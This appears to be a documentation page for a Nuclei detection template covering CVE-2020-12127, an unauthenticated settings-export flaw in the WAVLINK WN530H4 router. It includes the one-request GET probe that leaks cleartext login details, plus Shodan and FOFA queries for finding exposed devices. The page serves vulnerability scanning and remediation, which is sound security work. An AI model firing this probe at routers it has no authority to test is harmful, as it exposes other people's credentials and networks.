WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
ID: CVE-2020-12127
Severity: high
Author: arafatansari
Tags: cve,cve2020,wavlink,exposure
Description
Section titled “Description”WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
YAML Source
Section titled “YAML Source”id: CVE-2020-12127
info: name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure author: arafatansari severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. impact: | An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://cerne.xyz/bugs/CVE-2020-12127 - https://www.wavlink.com/en_us/product/WL-WN530H4.html - https://nvd.nist.gov/vuln/detail/CVE-2020-12127 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 epss-score: 0.06164 epss-percentile: 0.93545 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn530h4_firmware shodan-query: - http.html:"Wavlink" - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2020,wavlink,exposure
http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
matchers-condition: and matchers: - type: word part: body words: - 'Login=' - 'Password=' - 'Model=' - 'AuthMode=' condition: and
- type: status status: - 200# digest: 490a004630440220157813115cccd85e391c050a0368c56ae7091c5768228d018ca031caffb8b08502206d5259af60480a9e9b79bd4f70fdeacac1d59790a223e7a090b4eea8f24fbbf0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12127.yaml"